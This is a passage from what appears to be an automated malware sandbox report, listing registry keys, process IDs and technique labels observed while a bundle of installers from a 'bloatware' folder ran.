\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3cb220f1aaa32ca310586e5f62dcab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wim.dll Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vc_redist.x86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vc_redist.x86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 18 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2464 PING.EXE 764 PING.EXE 3320 PING.EXE 3724 PING.EXE 3356 PING.EXE 1796 PING.EXE 1664 PING.EXE 3108 PING.EXE 492 PING.EXE 3288 PING.EXE 2064 PING.EXE 3620 PING.EXE 2020 PING.EXE 3300 PING.EXE 3764 PING.EXE 2108 PING.EXE 1972 PING.EXE 3612 PING.EXE -
NSIS installer 4 IoCs
resource yara_rule behavioral1/files/0x000500000001a442-226.dat nsis_installer_1 behavioral1/files/0x000500000001a442-226.dat nsis_installer_2 behavioral1/files/0x000500000001d8f5-5021.dat nsis_installer_1 behavioral1/files/0x000500000001d8f5-5021.dat nsis_installer_2 -
Delays execution with timeout.exe 4 IoCs
pid Process 3864 timeout.exe 3308 timeout.exe 2860 timeout.exe 1596 timeout.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2028 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 2604 taskkill.exe 3320 taskkill.exe 1496 taskkill.exe 3360 taskkill.exe 2096 taskkill.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEFixedFontName = "Estrangelo Edessa" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "282" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "282" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437219416" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEFixedFontName = "MingLiu" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\36\IEPropFontName = "Myanmar Text" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\NumberOfSubdomains = "1" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\5\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEFixedFontName = "Mongolian Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "10998" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\28\IEPropFontName = "Gadugi" reg.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7B65CF41-9DB2-11EF-AE37-6A7FEBC734DB} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 reg.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe -
Modifies registry class 38 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} 1.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" 1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance regsvr32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" 1.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\\bloatware\\3.exe\" -- \"%1\"" 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter64.ax" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} 1.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command 3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" regsvr32.exe Key created 